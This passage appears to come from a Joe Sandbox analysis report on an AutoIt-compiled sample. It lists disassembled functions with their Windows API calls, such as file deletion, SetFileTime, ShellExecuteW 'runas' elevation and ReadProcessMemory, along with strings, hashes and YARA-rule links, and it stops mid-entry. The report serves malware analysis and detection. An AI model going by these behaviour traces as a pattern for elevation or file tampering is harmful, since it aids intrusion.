Opcode Fuzzy Hash: 44351ae6fdbc2488f781d41fe5d50ebbaa8f83fadaeda6be5a636a4d7e68d2ec
Instruction Fuzzy Hash: AB71B470D14288EBEF11DBB4C8547EEBB75AF19300F044199E648BB2C1D7BA1B49CB66

Uniqueness

Uniqueness Score: -1.00%

Function 01062947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01062C05
DeleteFileW.KERNEL32(?), ref: 01062C87
CopyFileW.KERNEL32 ref: 01062C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01062CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01062CC0

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 6ec771e102f284a73442d12efd975752fa9ba9807a5427cacca5e537074673d0
Instruction ID: 8d7f3752614a40a01b36455f7ddd8d1ba70163a10af003c5af4a5264f0f8aef6
Opcode Fuzzy Hash: 6ec771e102f284a73442d12efd975752fa9ba9807a5427cacca5e537074673d0
Instruction Fuzzy Hash: 46B16D72D0011EABDF21DBA4CC85EEEBBBDEF59350F0040A6F649E6154EB349A448F61

Uniqueness

Uniqueness Score: -1.00%

Function 01032BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00FF2B6B

Part of subcall function 00FF3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010C1418,?,00FF2E7F,?,?,?,00000000), ref: 00FF3A78

Part of subcall function 00FF9CB3: _wcslen.LIBCMT ref: 00FF9CBD

GetForegroundWindow.USER32 ref: 01032C10
ShellExecuteW.SHELL32(00000000,?,?,010B2224), ref: 01032C17

Strings

runas, xrefs: 01032C0B

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: a3d878e66cecac0f214bfd70bae12333e23c693d9e68cbb68e7194c89af74ea6
Instruction ID: 91347b7156aab8513499c877bc18efe64b7aaab87cb8db6cf93194da56cf4cf5
Opcode Fuzzy Hash: a3d878e66cecac0f214bfd70bae12333e23c693d9e68cbb68e7194c89af74ea6
Instruction Fuzzy Hash: DE119D31608209AAD615FF60DC82ABEBBA4AF95750F44141DF7C2560B3CF798A4AA712

Uniqueness

Uniqueness Score: -1.00%

Function 00191300 Relevance: 5.2, APIs: 3, Instructions: 720processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 00191B2D
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00191B73

Memory Dump Source

Source File: 00000008.00000002.779133927.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_name.jbxd

Similarity

API ID: Process$CreateMemoryRead
String ID:
API String ID: 2726527582-0
Opcode ID: f8f7afbd3a60ef6daf561255ccec5b0109585a1d8299ed3ea22ca16d56453c9c
Instruction ID: 4165e28a781b9d95d5429c871f6e9b2a0aa4c4017886ab533772aac4ba49b3a0
Opcode Fuzzy Hash: f8f7afbd3a60ef6daf561255ccec5b0109585a1d8299ed3ea22ca16d56453c9c
Instruction Fuzzy Hash: 37620930A14259DBEB24CFA4C851BDEB372EF58300F1091A9E50DEB394E7769E81CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00FF10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FF1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FF1BF4
Part of subcall function 00FF1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FF1BFC
Part of subcall function 00FF1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FF1C07
Part of subcall function 00FF1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FF1C12
Part of subcall function 00FF1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FF1C1A
Part of subcall function 00FF1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FF1C22

Part of subcall function 00FF1B4A: RegisterWindowMessageW.USER32(00000004,?,00FF12C4), ref: 00FF1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FF136A
OleInitialize.OLE32 ref: 00FF1388
CloseHandle.KERNEL32(00000000), ref: 010324AB

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: d8edcbdf86877244d3f02681d622d0f4ec8bf38c3604344ce543f0c1ebd677b2
Instruction ID: 3e669fab1e0d4f26b7567152fab352342d68921409c2ff19d9094ba11008e7b3
Opcode Fuzzy Hash: d8edcbdf86877244d3f02681d622d0f4ec8bf38c3604344ce543f0c1ebd677b2
Instruction Fuzzy Hash: C171CFB4905204CFD3A4EF79E5446A97AF0BB68340358826EE1CAC735BEB3E8405DF54

Uniqueness

Uniqueness Score: -1.00%

Function 010286AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000), ref: 01028704
GetLastError.KERNEL32(?,010285CC,?,010B8CC8,0000000C), ref: 0102870E
__dosmaperr.LIBCMT ref: 01028739

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 1319ca76295e1ee68b1befaa112cf367d68c129dbdc25827c1b3725d97b8f3c0
Instruction ID: 5bcf7d9dee0f059cc4dc634768d1a1da7afc67780f2be9addfc16e87e651d8d0
Opcode Fuzzy Hash: 1319ca76295e1ee68b1befaa112cf367d68c129dbdc25827c1b3725d97b8f3c0
Instruction Fuzzy Hash: 7201B63B60413126E2B16238A84CBFE2BD54B95734F24C19BE9D49B1C3DEB5C481C254

Uniqueness

Uniqueness Score: -1.00%

Function 01062FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 01062FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,01062CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01063006
CloseHandle.KERNEL32(00000000), ref: 0106300D

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: c00a68094061ea70566d70d65ee2d46edbc417923e8e85b231fb876ca596fce7
Instruction ID: 6248eb948045880b77545c0bf0483f488183bf47f10242d6394f968e8f601e61
Opcode Fuzzy Hash: c00a68094061ea70566d70d65ee2d46edbc417923e8e85b231fb876ca596fce7
Instruction Fuzzy Hash: 79E0863228421077F6301659BD4DFCF3E6CD78AB71F104214F7D9790C086A5150153B8

Uniqueness

Uniqueness Score: -1.00%

Function 01066EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 01066F6B

Part of subcall function 00FF4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,010C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FF4EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 01066F5A, 01066F63

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 5ef62309ff7d53eeec3c0c6c6182a789a2990b50e44cdd41330051c0262b500c
Instruction ID: 079058cc98ec7105bc6f470e4155c4aae5f0fddd4151cfeb825c4b13e03d3f59
Opcode Fuzzy Hash: 5ef62309ff7d53eeec3c0c6c6182a789a2990b50e44cdd41330051c0262b500c
Instruction Fuzzy Hash: B9B1A1311082058FDB14EF24C8919BFB7E5AF94304F44886DF696872A2EF74ED49DB92

Uniqueness

Uniqueness Score: -1.00%

Function 0102C827 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 0102C84C

Strings

, xrefs: 0102C891

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: ed6aaf47c158f68802c6436886a332e8abef037070b5825b587f975d754a4821
Instruction ID: 8276e19e9ca2242a48ce3f69212da9add85e1b62e1f1f8bc8967b575712ca934
Opcode Fuzzy Hash: ed6aaf47c158f68802c6436886a332e8abef037070b5825b587f975d754a4821
Instruction Fuzzy Hash: B6412B716042AC9AEB258E68CD84BFEBBE9EB45304F1804EDD5CE87142D2759A45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00FF2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 01032C8C

Part of subcall function 00FF3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FF3A97,?,?,00FF2E7F,?,?,?,00000000), ref: 00FF3AC2

Part of subcall function 00FF2DA5: GetLongPathNameW.KERNELBASE ref: 00FF2DC4

Strings

X, xrefs: 01032C5A

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 1bf1e8b33dfd33859a817392b03ed5b0e5e738431e3cb5d609669738a16a9b18
Instruction ID: 2754caaf23dbdbd529a1f54fd5f66823f5078e3257e48ff6cf5a7d8cc50b269a
Opcode Fuzzy Hash: 1bf1e8b33dfd33859a817392b03ed5b0e5e738431e3cb5d609669738a16a9b18
Instruction Fuzzy Hash: D421F371A0024C9FCB41EF94C845BEE7BFCAF89304F008059E544B7245DBB85A899F61

Uniqueness

Uniqueness Score: -1.00%

Function 01062557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 01062587

Strings

EA06, xrefs: 010625B9

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 929dc1baf657e081a06f6731d0a8b48f98445c714d0f864679b34a34f9072349
Instruction ID: e828ebd9b346c60304958a077f4fd4bbeced0be3a4d9cefd75f296985e5a765d
Opcode Fuzzy Hash: 929dc1baf657e081a06f6731d0a8b48f98445c714d0f864679b34a34f9072349
Instruction Fuzzy Hash: CB01B1729042687EDF29C7A9C856EEEBBFC9B15201F00459AE593D6181E5B8E6088B60

Uniqueness

Uniqueness Score: -1.00%

Function 01023162 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 010231A1

Strings

FlsAlloc, xrefs: 01023173, 0102317D

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 7665ee99d596047d0a87483a294abde947de6442cd46e81e2bac05aa20c49465
Instruction ID: 40fc3112b854fba46664a2c32fcdf3eb00d9e251820283eb816472a4335a7a09
Opcode Fuzzy Hash: 7665ee99d596047d0a87483a294abde947de6442cd46e81e2bac05aa20c49465
Instruction Fuzzy Hash: CAE0553178622CB7EB206BA19D11EADBBA0EF58711B0001AAF9C45B204C9790A01E6D6

Uniqueness

Uniqueness Score: -1.00%

Function 0102CB7C Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0102C74F: GetOEMCP.KERNEL32(00000000), ref: 0102C77A

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0102CA1D,?,00000000), ref: 0102CBF0
GetCPInfo.KERNEL32(00000000,0102CA1D,?,?,?,0102CA1D,?,00000000), ref: 0102CC03

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 14dc40df816c7d1a0523b4574fcfdcd78b7c74c6c9d0f71b5e0ec31be55dcfa0
Instruction ID: 024a2d27fe2a58f384ac493d119914d1d9f6d165a217966123ee266261ec32f0
Opcode Fuzzy Hash: 14dc40df816c7d1a0523b4574fcfdcd78b7c74c6c9d0f71b5e0ec31be55dcfa0
Instruction Fuzzy Hash: 4C51557090426A9FFB219F79CA806FFBFE5EF41200F2480AED0D68B151D73995428B90

Uniqueness

Uniqueness Score: -1.00%

Function 0102C9BB Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 01022D74: GetLastError.KERNEL32(?,?,01025686,01033CD6,?,00000000,?,01025B6A,?,?,?,?,?,0101E6D1,?,010B8A48), ref: 01022D78
Part of subcall function 01022D74: _free.LIBCMT ref: 01022DAB
Part of subcall function 01022D74: SetLastError.KERNEL32(00000000,?,?,?,?,0101E6D1,?,010B8A48,00000010,00FF4F4A,?,?,00000000,01033CD6), ref: 01022DEC
Part of subcall function 01022D74: _abort.LIBCMT ref: 01022DF2

Part of subcall function 0102CADA: _abort.LIBCMT ref: 0102CB0C
Part of subcall function 0102CADA: _free.LIBCMT ref: 0102CB40

Part of subcall function 0102C74F: GetOEMCP.KERNEL32(00000000), ref: 0102C77A

_free.LIBCMT ref: 0102CA33
_free.LIBCMT ref: 0102CA69

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 675a9e98c080ced2f65a9a09d75fe9377e57b1f81464c6565eef74ee86e65a2e
Instruction ID: bf0c151e3e90926ff088718907cab51a5c095da42f496fb409e797baf9c8dd30
Opcode Fuzzy Hash: 675a9e98c080ced2f65a9a09d75fe9377e57b1f81464c6565eef74ee86e65a2e
Instruction Fuzzy Hash: 3F310531900269AFFB21EBACD640BDDBBF4EF44324F2101DAE8849B291EB365D40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01022FD7 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00FF1129,00000000,00000000,00000000,?,0102328B,00000006,FlsSetValue,01092290,FlsSetValue,00000000,00000364,?,01022E46,00000000), ref: 01023037
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 01023044

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: b6756dd221c77127686762210903f66775f5d2a52c5caf3b659a2ccbb2803c30
Instruction ID: 89dcc32f103f2d428958af00a940053ba87c789e225dc87b06a46301b5b5adc8
Opcode Fuzzy Hash: b6756dd221c77127686762210903f66775f5d2a52c5caf3b659a2ccbb2803c30
Instruction Fuzzy Hash: 7C11C833A001319BAB359D5DD9E059A7795BB897607060150FE95AF148D73DEC0187F1

Uniqueness

Uniqueness Score: -1.00%

Function 001910D0 Relevance: 1.7, APIs: 1, Instructions: 157COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,00000208), ref: 001911A6

Part of subcall function 001908E0: GetFileAttributesW.KERNELBASE(?), ref: 001908EB

Memory Dump Source

Source File: 00000008.00000002.779133927.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_name.jbxd

Similarity

API ID: AttributesFileFolderPath
String ID:
API String ID: 1512852658-0
Opcode ID: 54185be7556820125c0798c1bdfd0e7d61e550ba7c0daec645b385125b6869c9
Instruction ID: 8d4e2a082f5d3d7449b1614502b2f29b1ec58a767640e11abdb7e4812f1b4301
Opcode Fuzzy Hash: 54185be7556820125c0798c1bdfd0e7d61e550ba7c0daec645b385125b6869c9
Instruction Fuzzy Hash: E1517531A1120DA6DF14FFA0C955BEF7379EF58700F0045A9A609E7280EB79AB44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00FF4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FF4E90: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00FF4E9C
Part of subcall function 00FF4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,00FF4EDD,?,010C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FF4EAE
Part of subcall function 00FF4E90: FreeLibrary.KERNEL32(00000000,?,?,00FF4EDD,?,010C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FF4EC0

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,010C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FF4EFD

Part of subcall function 00FF4E59: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00FF4E62
Part of subcall function 00FF4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,01033CDE,?,010C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FF4E74
Part of subcall function 00FF4E59: FreeLibrary.KERNEL32(00000000,?,?,01033CDE,?,010C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FF4E87

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 9702e2f09c4082b0ea81bed70219a50a664e35a1a9b32f2dedf1e5913228c13f
Instruction ID: fef19d85738fc26dd6f4215c37db0c6eeaf1b29c5af6cd82cca5eba913a30088
Opcode Fuzzy Hash: 9702e2f09c4082b0ea81bed70219a50a664e35a1a9b32f2dedf1e5913228c13f
Instruction Fuzzy Hash: 6D112732610209ABDB10BF64DC02FFE77A4AF40B10F10442DF686BB1E1EE78AA05A750

Uniqueness

Uniqueness Score: -1.00%

Function 01028402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 01028440

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: df51470f74167a6c4be85fa2b5154c2b6db39b4d51fa168ffa11dbf4ba6cc3bb
Instruction ID: fe1b4c474d9b2a8c237899c8e981c701cc36e43bad9b12ad41b6e525c88f60ed
Opcode Fuzzy Hash: df51470f74167a6c4be85fa2b5154c2b6db39b4d51fa168ffa11dbf4ba6cc3bb
Instruction Fuzzy Hash: 7311187590410AAFCB15DF58E9409DE7BF9EF48314F14809AFC48AB311D631DA21CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0101E469 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__alldvrm.LIBCMT ref: 0101E4BE

Memory Dump Source

